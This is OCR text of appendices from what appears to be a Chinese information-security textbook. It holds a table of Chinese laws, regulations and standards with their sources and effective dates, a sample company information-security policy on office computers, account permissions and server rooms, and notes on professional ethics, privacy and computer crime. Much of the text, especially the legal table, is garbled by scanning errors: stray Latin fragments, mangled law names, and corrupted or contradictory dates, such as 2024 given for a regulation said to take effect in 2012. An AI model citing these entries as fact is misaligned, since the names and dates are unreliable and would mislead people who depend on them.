利 法 人 民 代表 大 会 常务 委员 会 第 六 次 会 议 (关于 修改 (中 华人 
民 共和 国 专利 法 ) 的 决定 ) 第 三 次 修正 ) 


01 1985. 04. 01 


由 中 华人 民 共 和 国 第 九 届 全 国人 民 代 表 大 会 常务 委员 会 


02 第 十 六 次 会 议 于 2000 年 7 月 8 日 通过 , 自 2000 年 9 月 1| 2000.09.01 
日 起 施行 
由 中 华人 民 共 和 国 第 九 届 全 国人 民 代 表 大 会 常务 委员 会 
03 zc 第 十 二 次 会 议 于 1999 4 10 H 31 日 修订 通过 , 自 2000| 2000.07.01 
年 7 月 1 日 起 施行 


根据 2012 年 12 月 28 日 第 十 二 届 全 国人 民 代 表 大 会 常 


04 | 中 华人 民 共和 国 公 | 务 委员 会 第 六 次 会 议 通过 《关于 修改 (中 华人 民 共和 国 海 soli;ns;ol 


司法 洋 环境 保护 法 等 七 部 法 律 的 决定 ?第 三 次 修正 ,于 2014 
年 3 月 1 日 起 实施 ) 。 
55 中 华人 民 共 和 国 合 | 由 中 华人 民 共 和 国 第 九 届 全 国人 民 代 表 大 会 第 二 次 会 议 1 
同 法 于 1999 年 3 月 15 日 通过 , 自 1999 年 10 月 1 日 起 施行 mE 


1982 年 8 月 23 日 第 五 届 全 国人 民 代 表 大 会 常务 委员 会 
og | 中 华人 民 共和 国 商 | 第 二 十 四 次 会 议 通过 。 根据 2013 年 8 月 30 日 第 十 二 届 TM 
标 法 全 国人 民 代表 大 会 常务 委员 会 第 四 次 会 议 ( 关 于 修改 (中 UU 


华人 民 共 和 国 商 标 法 ) 的 决定 ) 第 三 次 修正 ) 


1987 年 9 月 5 日 第 六 届 全 国人 民 代表 大 会 常务 委员 会 
中 华人 民 共 和 国 档 | 第 二 十 二 次 会 议 通 过 。 根据 1996 年 7 月 5 日 第 八 届 全 
案 法 国人 民 代 表 大 会 常务 委员 会 第 二 十 次 会 议 ( 关 于 修改 
《中华 人民 共 和 国 档案 法 ) 的 决定 ) 修 正 


07 1988. 01. 01 


1979 年 7 月 1 日 第 五 届 全 国人 民 代表 大 会 第 二 次 会 议 
os | 中 华人 民 共 和 国 | 通过 。 《中 华人 民 共 和 国 刑法 修正 案 ( 八 )》( 发 布 日 期 : Oil oi 
刑法 2011 年 2 月 25 日 实施 日 期 : 2011 年 5 月 1 日 ) 修 正 或 UU 


修改 
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续 表 
序号 | 通用 法 律 法 规 名 称 来 源 说 明 生效 /实施 时 间 
= 1998 ££ 4 H 29 日 第 九 届 全 国人 民 代 表 大 会 常务 委员 会 
09 第 二 次 会 议 通过 ,2008 年 10 H 28 日 第 十 一 届 全 国人 民 | 2009.05.01 
代表 大 会 常务 委员 会 第 五 次 会 议 修订 
中 华人 民 共 和 国 主席 令 第 三 十 七 号 (中 华人 民 共 和 国民 
10 中 华人 民 共 和 国民 | 法 通则 》 已 由 中 华人 民 共 和 国 第 六 届 全 国人 民 代 表 大 会 1987.01.01 
法 通则 第 四 次 会 议 于 一 九 八 六 年 四 月 十 二 日 通过 , 现 予 公布 , 自 Sat 
一 九 八 七 年 一 月 一 日 起 施行 
ü 中 华人 民 共 和 国 劳 | 1994 年 7 月 5 日 第 八 届 全 国人 民 代 表 大 会 常务 委员 会 1995: 01:01 
动 法 第 八 次 会 议 通过 TUS 
12 中 华人 民 共 和 国 劳 | 2007 年 6 月 29 日 第 十 届 全 国人 民 代表 大 会 常务 委员 会 2008:01:01 
动 合 同 法 第 二 十 八 次 会 议 通过 
_ | 1993 年 2 月 22 日 第 七 届 全 国人 民 代表 大 会 常务 委员 会 
13 SCARE 第 三 十 次 会 议 通过 ,1993 年 2 月 22 日 中 华人 民 共 和 国 | 1993.02. 22 
主席 令 第 68 号 公布 
_ | 1988 4£ 12 H 29 日 第 七 届 全 国人 民 代 表 大 会 常务 委员 
14 ire ac 会 第 五 次 会 议 通过 ,1988 年 12 H 29 日 中 华人 民 共 和 国 | 1989.04.01 
主席 令 第 11 号 公布 
15 中 华人 民 共 和 国治 |《 中 华人 民 共 和 国治 安 管理 处 罚 法 》2005 年 8 月 28 日 公 2006. 03. 01 
安 管理 处 罚 法 布 ,2006 年 3 月 1 日 起 实施 dde 
全 国人 民 代表 大 会 常务 委员 会 关于 修改 (中华 人民 共和 
- 国 消费 者 权益 保护 法 ) 的 决定 ) 已 由 中 华人 民 共和 国 第 十 
16 nl 二 届 全 国人 民 代表 大 会 常务 委员 会 第 五 次 会 议 于 2013 | 1994.04.01 
年 10 月 25 日 通过 , 现 予 公布 , 自 2014 年 3 月 15 日 起 
施行 
1990 年 9 月 7 日 第 七 届 全 国人 民 代 表 大 会 常务 委员 会 
17 中 华人 民 共 和 国 著 | 第 十 五 次 会 议 通过 ,根据 2010 年 2 月 26 日 第 十 一 届 全 1991. 06.01 
作 权 法 国人 民 代 表 大 会 常务 委员 会 第 十 三 次 会 议 ( 关 于 修改 (中 iin 
华人 民 共 和 国 著作 权 法 ) 的 决定 ) 第 二 次 修正 
随 着 我 国 社会 和 经 济 的 不 断 发 展 ,提高 计算 机 和 网 络 的 
18 eaa A 普及 应 用 程度 ,合理 扩大 利用 互联 网 ,已 成 为 推进 国民 经 | 2001.01.01 
济 和 社会 信息 化 的 重要 任务 
2000 年 12 月 28 日 ,第 九 届 全 国人 民 代 表 大 会 常务 委员 
19 EP TEMESH | 会 第 十 九 次 会 议 通过 (全 国人 民 代表 大 会 党 务 委员 会 关 | 2000.12.28 
于 维护 互联 网 安全 的 决定 》 
为 了 加 强 商用 密码 管理 ,保护 信息 安全 ,保护 公民 和 组 织 
的 合法 权益 ,维护 国家 的 安全 和 利益 ,制定 商用 密码 管理 
20 | 商用 密码 管理 条 例 | 条 例 。 本 条 例 为 中 华人 民 共和 国 国务 院 令 第 273 号 , 自 | 199 10.07 
1999 年 10 月 7 日 发 布 之 日 起 实施 
Y 中 华人 民 共 和 国 公安 部 令 第 51 号 《计算 机 病毒 防治 管 
21 lisa aud 理 办 法 ) 已 经 2000 年 3 月 30 日 公安 部 部 长 办 公会 议 通 | 2000.04. 26 
过 , 现 予 发 布施 行 


附录 D 信息 安全 相关 法 律 法 规 (部 分 ) 


续 表 
序号 | 通用 法 律 法 规 名 称 来 源 说 明 生效 /实施 时 间 
22 | 计算 机 软件 保护 | 中 华人 民 共和 国 国务 院 令 第 339 号 公布 (计算 机 软件 保 | 200? 01 01 
条 例 护 条 例 》, 自 2002 年 1 月 1 日 起 施行 dd 
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软件 产品 管理 办 法 


《软件 产品 管理 办 法 ) 已 经 2009 年 2 月 4 日 中 华人 民 共 
和 国 工业 和 信息 化 部 第 6 次 部 务 会 议 审议 通过 , 现 予 公 
Hi, H 2009 年 4 月 10 日 起 施行 


2009. 
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互联 网 信息 服务 管 
理 办 法 


《互联 网 信息 服务 管理 办 法 ) 经 2000 年 9 H 20 日 国务 院 
第 31 次 常务 会 议 通 过 ,2009 年 9 月 25 日 公布 施行 


2009. 


. 25 


25 


中 华人 民 共 和 国电 
子 签名 法 


《中 华人 民 共 和 国电 子 签 名 法 ) 已 由 中 华人 民 共 和 国 第 十 
届 全 国人 民 代 表 大 会 常务 委员 会 第 十 一 次 会 议 于 2004 
年 8 月 28 日 通过 , 现 予 公布 , 自 2005 年 4 月 1 日 起 施行 


2005. 


.01 


26 


中 华人 民 共 和 国 技 
术 进 出 口 管理 条 例 


根据 (中 华人 民 共 和 国 对 外 贸易 法 》 及 其 他 有 关 法 律 的 有 
关 规 定制 定 , 经 2001 年 10 月 31 日 国务 院 第 46 次 常务 
会 议 通过 ,由 中 华人 民 共 和 国 国 务 院 于 2002 年 1 月 1 日 
颁布 施行 


2002. 


.01 


27 


中 华人 民 共 和 国 计 
算 机 信息 系统 安全 
保护 条 例 


中 华人 民 共 和 国 国务 院 令 第 147 号 ,自发 布 之 日 起 施行 


1994. 
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中 华人 民 共 和 国保 
守 国 家 秘密 法 实施 
条 例 


自 2014 年 3 月 1 日 起 施行 


2014. 


29 


计算 机 信息 系统 安 
全 专用 产品 分 类 
原则 


1997 年 4 月 21 日 发 布 ,1997 年 7 月 1 日 实施 ,公安 部 
发 布 


1997. 


.01 


30 


计算 机 信息 系统 国 
际 联网 保密 管理 
规定 


为 了 加 强 计算 机 信息 系统 国际 联网 的 保密 管理 ,确保 国 
家 秘密 的 安全 ,根据 (中 华人 民 共 和 国保 守 国 家 秘密 法 》 
和 国家 有 关 法 规 的 规定 ,制定 本 规定 。 


2000. 


.01 


31 


计算 机 信息 网 络 国 
际 联网 安全 保护 管 
理 办 法 


《计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 ) 由 中 华人 
民 共 和 国 国务 院 于 1997 年 12 月 11 日 批准 ,公安 部 于 
1997 年 12 月 16 日 颁布 ,于 1997 年 12 H 30 日 实施 


1997. 


. 30 


32 


GA/T 390—2002 
计算 机 信息 系统 安 
全 等 级 保护 通用 技 
术 要 求 


中 华人 民 共 和 国 公安 部 发 布 


2002. 


07. 


33 


GB/Z  20985— 
2007 信息 技术 安 
全 技术 信息 安全 
事件 管理 指南 


中 华人 民 共 和 国 国 家 质量 监督 检验 检疫 总 局 ,中 国 国家 
标准 化 管理 委员 会 


2007. 


34 


强制 性 产品 认证 管 
理 规定 


国家 质量 监督 检验 检疫 总 局 


2009. 


09. 


01 
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续 表 
序号 | 通用 法 律 法 规 名 称 来 源 说 明 生效 /实施 时 间 
gg | ISO 9000: 2008 质 | TC176(TC176 指 质量 管理 体系 技术 委员 会 ) 制 定 的 所 有 —— 
量 管理 体系 标准 | 国际 标准 
36 中 华人 民 共 和 国 | 2004 年 3 月 14 日 第 十 届 全 国人 民 代 表 大 会 第 二 次 会 议 1982 年 
宪法 通过 的 《中 华人 民 共 和 国 宪法 修正 案 ) 修 正 
中 华人 民 共 和 国 第 十 一 届 全 国人 民 代 表 大 会 常务 委员 会 
37 fila n 第 十 二 次 会 议 于 2009 年 12 月 26 日 通过 , 现 予 公布 , 自 2010 年 
2010 年 7 月 1 日 起 施行 
gag | 1999 年 8 月 30 日 第 九 届 全 国人 民 代表 大 会 常务 委员 会 
38 Pa PM | 第 十 一 次 会 议 通过 ，1999 年 8 月 30 日 中 华人 民 共和 国 | 。 2000€ 
主席 令 第 二 十 一 号 公布 , 自 2000 年 1 月 1 日 起 施行 
《中 华人 民 共 和 国 招标 投标 法 实施 条 例 ) 已 经 2011 年 11 
39 TAREAM ^| 月 30 日 国务 院 第 183 次 常务 会 议 通过 , 现 巴 公布, 自 | 2024 


2012 年 2 月 1 日 起 施行 


40 


ISO 20000 质量 
体系 


2005 年 5 月 17 日 ,国际 标准 组 织 (ISO) 正 式 接受 
BS15000 成 为 一 个 新 的 国际 标准 , 即 ISO20000 


2005 年 


附录 EE 信息 安全 管理 制度 ( 样 例 ) 


X X 公 司 信息 安全 管理 制度 
第 一 章 总 n 


为 了 加 强 公司 计算 机 信息 系统 安全 保护 工作 ,保障 公司 计算 机 信息 系统 安全 、 稳 定 运 
行 , 根 据 ( 中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 等 有 关 法 律 法规 ,制定 本 制度 。 
本 制度 适用 于 XX 公司 及 下 属 各 子 公司 。 


第 二 章 ”办 公 电 脑 管理 


1. 计算 机 的 使 用 部 门 要 保持 清洁 ,安全 ,良好 的 计算 机 设备 工作 环境 ,禁止 在 计算 机 
应 用 环境 中 放置 易 燃 、 易 爆 、. 强 腐蚀 ` 强 磁性 等 有 害 计算 机 设备 安全 的 物品 。 做 到 谁 使 用 
谁 负责 的 原则 。 

2. 严格 遵守 计算 机 设备 使 用 .开机 、 关 机 等 安全 操作 规程 和 正确 的 使 用 方法 。 任何 
人 不 允许 带电 捅 拔 计算 机 外 部 设备 接口 ,计算 机 出 现 故障 时 应 及 时 向 计算 机 维护 部 门 报 
告 , 不 允许 私自 处 理 或 找 非 本 公司 技术 人 员 进 行 维修 及 操作 。 

3. 非 本 公司 技术 人 员 对 我 公司 的 设备 .系统 等 进行 维修 、 维 护 时 ,必须 由 本 公司 相关 
技术 人 员 现场 全 程 监督 。 计 算 机 设备 送 外 维修 , 须 经 有 关 部 门 负责 人 批准 。 

A4. 员工 岗位 变动 时 必须 根据 相关 规定 移交 使 用 的 计算 机 及 计算 机 里 面 保存 的 资料 。 

5. 管理 部 门 应 对 报废 设备 中 存 有 的 程序 .数据 资料 进行 备份 后 清除 ,并 妥善 处 理 废 
弃 无 用 的 资料 和 介质 ,防止 泄密 。 

6. 未 经 有 关 部 门 允许 不 准 在 办 公 电 脑 上 安装 其 他 软件 、 不 准 使 用 来 历 不 明 的 载体 
(包括 U 盘 、 光 盘 、 移 动 硬盘 等 ) 。 

7. 不 得 私自 在 公司 网 络 上 以 任何 形式 绕 过 公司 网 络 连接 外 部 公共 网 ,破坏 公司 网 络 
的 完整 性 。 

8. 不 得 私自 在 公司 网 络 上 安装 服务 器 软件 .代理 软件 和 影响 网 络 安全 的 其 他 软件 。 
不 得 安装 和 使 用 黑客 软件 .恶意 软 件 .游戏 和 其 他 与 工作 无 关 的 软件 。 

9. 掌握 使 用 防 病毒 软件 ,配合 信息 管理 部 防止 病毒 的 蔓延 ,发 现 可 疑 病毒 或 杀毒 软 
件 不 能 自动 升级 ,应 及 时 向 信息 部 报告 。 

lo. 使 用 公司 规定 的 正版 软件 .尊重 知识 产权 。 

11. 不 得 私自 安装 操作 系统 ,特殊 要 求 必须 经 信息 管理 部 批准 。 
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12. 外 来 电脑 加 入 公司 局 域 网 ,要 符合 公司 的 信息 安全 规定 。 
第 三 章 ”虚拟 权限 管理 


操作 员工 号 (包括 权限 卡 ) 是 进入 各 类 应 用 系统 (商业 管理 系统 、 财 务 / 人 力 资源 系统 、 
办 公信 息 平台 收银 系统 等 ) 进 行业 务 操作 ,分 级 对 数据 存 取 进行 控制 的 。 操 作 工 号 的 设 
置 根据 不 同 应 用 系统 的 要 求 及 岗位 职责 而 设置 。 

1. 不 得 将 自己 的 操作 工 号 转借 给 他 人 使 用 ,或 者 是 使 用 他 人 的 操作 工 号 进行 操作 。 

2. 操作 人 员 移 动 时 必须 将 相关 的 操作 工 号 报 相关 部 门 进行 权限 设置 或 者 暂停 处 理 。 

3. 操作 工 号 必须 设置 密码 ,不 得 使 用 初始 密码 。 密 码 设置 应 具有 安全 性 、 保 密 性 ,不 
应 是 名 字 、 生 日 . 重复、 顺序、 规律 数字 等 容易 猜测 的 数字 和 字符 串 , 并 且 必 须 定期 更 改 
密码 。 

A. 新 增 和 修改 操作 工 号 权限 ,必须 赁 签 走 相 关 流 程 由 信息 管理 部 存档 后 执行 。 


第 四 章 ”机 房管 理 制 度 


1. 机 房 的 管理 由 信息 管理 部 技术 人 员 负 责 , 其 他 工作 人 员 示 经 允许 不 准 进 入 。 

2. 机 房 内 应 保持 整洁 ,严禁 吸烟 ,吃喝 、 聊 天 ,会 客 、 睡 觉 。 不 准 在 计算 机 及 工作 台 附 
近 放 置 可 能 危及 设备 安全 的 物品 。 

3. 机房 内 严禁 一 切 与 工作 无 关 的 操作 。 严 禁 外 来 盘 片 带 入 机 房 , 未 经 允许 不 准将 机 
器 设备 和 数据 带 出 机 房 。 

4. 认真 做 好 机 房 内 各 类 记录 介质 的 保管 工作 ,落实 专人 收集 、 保 管 ,信息 载体 必须 安 
全 存放 、 保 管 ,防止 丢失 或 失效 。 机 房 资 料 外 借 必须 经 批准 并 懂行 手续 ,作废 资料 严禁 
外 漆 。 

5. 机 房 工 作 人 员 对 机 房 存在 的 隐患 及 设备 故障 要 及 时 报告 ,并 与 有 关 部 门 及 时 联系 
处 理 。 非 常情 况 下 应 立即 采取 应 急 措 施 并 保护 现场 。 

6. 机 房 设备 应 由 专业 人 员 操作 、 使 用 ,禁止 非 专业 人 员 操作 、 使 用 。 对 各 种 设备 应 按 
规范 要 求 操作 、 保 养 。 发 现 故障 ,应 及 时 报请 维修 ,以 免 影响 工作 。 

7. 外 来 单位 人 员 因 工作 需要 进入 机 房 时 ,必须 听从 信息 部 技术 员 的 安排 ,未 经 许可 ， 
不 得 乱 动 机 房 内 设施 。 

8. 中 心机 房 处 理 秘密 事务 时 ,不 得 接待 参观 人 员 或 靠近 观看 。 


附录 信息 安全 职业 道德 


一 、 职 业 和 道德 规范 


“职业 化 ?应 该 视 为 从 业 人 员 、 职 业 团体 及 其 服务 对 象 ( 即 社会 公众 ) 之 间 的 三 方 关系 
准则 。 该 准则 为 从 业 人 员 、 职 业 团体 和 社会 公众 隐 含 地 拟订 一 个 三 方 协议 ,协议 中 规定 的 
各 方 的 需求 .期望 和 责任 就 构成 了 职业 化 的 基本 内 涵 。 提 供 的 任何 一 项 服务 都 应 该 达到 
三 方 的 满意 。 

职业 道德 是 从 事 某 一 职业 ,并 得 以 生存 和 发 展 的 必要 条 件 。 它 要 求 从 业 人 员 具 有 与 
职业 理想 相称 的 价值 观 ,具有 足够 的 、 完 成 规定 服务 所 要 求 的 知识 和 技能 。 

“职业 化 ?是 一 个 适用 于 所 有 职业 的 一 个 总 的 原则 性 协议 ,但 具体 到 某 一 个 行业 时 ,还 
应 考虑 其 自身 特殊 的 要 求 。 

任何 一 个 职业 都 要 求 其 从 业 人 员 遵 守 一 定 的 职业 和 道德 规范 ,同时 承担 起 维护 这 些 
规范 的 责任 。 虽然 这 些 职业 和 道德 规范 没有 法 律 法 规 所 具有 的 强制 性 ,但 遵守 这 些 规范 
对 行业 的 健康 发 展 是 至 关 重要 的 。 

道德 是 个 人 的 ,在 道德 判断 中 因为 立场 不 同 ,可 能 没有 统一 的 对 错 标准 ,也 不 能 强制 
执行 。 


-、 软 件 工程 师 道德 规范 


CD 公众 。 从 职业 角色 来 说 ,软件 工程 师 应 当 始 终 关注 公众 的 利益 ,按照 与 公众 的 安 
全 健康 和 幸福 相 一 致 的 方式 发 挥 作用 。 

(2) 客户 和 雇主 。 软 件 工程 师 应 该 了 解 什 么 是 客户 和 雇主 的 最 大 利益 ,应 该 总 是 以 
职业 的 方式 担当 他 们 的 客户 或 雇主 的 忠实 代理 人 和 委托 人 。 

(3) 产品。 软件 工程 师 应 当 尽 可 能 地 确保 他 们 开发 的 软件 对 于 雇主 、 客 户 以 及 用 户 
是 有 用 的 ,在 质量 上 是 可 接受 的 ,按期 完成 .费用 合理 、 没 有 错误 。 

(4) 判断 。 软 件 工程 师 应 当 完 全 坚持 自己 独立 自主 的 专业 判断 并 维护 其 判断 的 
声誉 。 

(5) 管理 。 管 理 者 和 领导 应 当 通过 规范 的 方法 赞成 和 促进 软件 管理 的 发 展 与 维护 ， 
并 鼓励 他 们 所 领导 的 人 员 履 行 个 人 和 集体 的 义务 。 

(6) 职业 。 软 件 工程 师 应 该 提高 他 们 职业 的 正直 性 和 声誉 ,并 与 公众 的 兴趣 保持 
一 致 。 
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CD 同事 。 软 件 工程 师 应 该 公平 合理 地 对 待 他 们 的 同事 ,并 应 该 采取 积极 的 步骤 支 
持 社团 的 活动 。 

(8) 自身 。 软 件 工程 师 应 当 在 他 们 的 整个 职业 生涯 中 积极 参与 有 关 职 业 规 范 的 学 
习 , 提 高 从 事 自己 的 职业 所 应 该 具有 的 能 力 , 以 推进 职业 规范 的 发 展 。 


三 、 网 络 用 户 道德 规范 


D 不 能 利用 邮件 服务 作 连 锁 邮件 、 垃 圾 邮件 或 分 发 给 任何 未 经 允许 接收 信件 的 人 。 

(2) 不 传输 任何 非法 的 、 骚 扰 性 的 .中 伤 他 人 的 、 辱 轨 性 的 ` 丽 吓 性 的 、 伤 害 性 的 、 良 俗 
的 淫秽 的 信息 资料 。 

(3) 不 能 传输 任何 教唆 他 人 构成 犯罪 行为 的 资料 。 

(4) 不 能 传输 道德 规范 不 允许 或 涉及 国家 安全 的 资料 。 

(5) 不 能 传输 任何 不 符合 地 方 、 国 家 和 国际 法 律 、 道 德 规范 的 资料 。 

(6) 不 得 未 经 许可 而 非法 进入 其 他 电脑 系统 。 


四 、 隐 私 和 公民 自由 


隐私 是 指 私 人 生活 秘密 或 私生活 秘密 。 隐 私 权 是 指 公 民 享 有 的 个 人 生活 不 被 干扰 的 
权利 和 个 人 资料 控制 权 。 

计算 机 网 络 空间 的 个 人 隐私 权 是 指 公 民 在 网 络 中 享有 的 私人 生活 安宁 与 私人 信息 依 
法 受到 保护 ,不 被 他 人 非法 侵犯 知悉 、 搜 集 、 复 制 . 公 开 和 利用 的 权利 ;禁止 在 网 上 泄露 某 
些 与 个 人 有 关 的 敏感 信息 ,包括 事实 、 图 像 以 及 毁损 的 意见 等 。 

《计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 》 规 定 : 用 户 的 通信 自由 和 通信 秘密 
受 法 律 保护 ,任何 单位 和 个 人 不 得 利用 互联 网 侵犯 用 户 的 通信 自由 和 通信 秘密 ;不 得 
擅自 进入 未 经 许可 的 部 门 , 算 改 他 人 信息 ;不 得 在 网 络 上 散发 恶意 信息 , 冒 用 他 人 名 义 
发 信息 ,侵犯 他 人 隐私 ;不 得 制造 传播 计算 机 病毒 及 从 事 其 他 侵犯 他 人 合法 权益 的 
活动 。 

计算 机 网 络 空间 的 个 人 隐私 权 的 主要 内 容 包 括 知 情 权 、 选 择 权 、 合 理 的 访问 权限 、 足 
够 的 安全 性 、 信 息 控制 权 和 请 求 司法 救济 权 等 。 


五 、 计 算 机 犯罪 


计算 机 犯罪 是 指 因 计 算 机 技术 和 知识 起 了 基本 作用 而 产生 的 非法 行为 。 

计算 机 犯罪 分 类 有 以 下 几 类 。 

1. 使 用 了 计算 机 和 网 络 新 技术 的 传统 犯罪 

主要 包括 : 故意 直接 对 计算 机 实施 侵入 或 破坏 ;利用 计算 机 实施 诈骗 .盗窃 、 贪 污 、 挪 
目 公 款 ,窃取 国家 秘密 或 从 事 反 动 活动 等 。 

2. 计算 机 与 网 络 环境 下 的 新 型 犯罪 

主要 包括 : 违反 国家 规定 ,故意 侵入 国家 事务 .国防 建设 .尖端 科学 技术 等 计算 机 信 
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息 系统 ;未 经 授权 非法 使 用 计算 机 ,破坏 计算 机 信息 系统 ,影响 计算 机 系统 正常 运行 且 造 
成 严重 后 果 ; 制 作 、 传 播 计算 机 病毒 等 。 

计算 机 犯罪 的 特点 主要 有 智能 性 、 隐 项 性 、 复 杂 性 .跨国 性 、 匿 名 性 。 

计算 机 犯罪 的 现状 是 : 发 现 概率 比较 低 , 损 失 大 ,对 象 广泛 ,发 展 迅 速 , 涉 及 面 广 ; 持 
获 利和 探秘 动机 居多 ;低龄 化 和 内 部 人 员 多 ;社会 危害 巨大 。 
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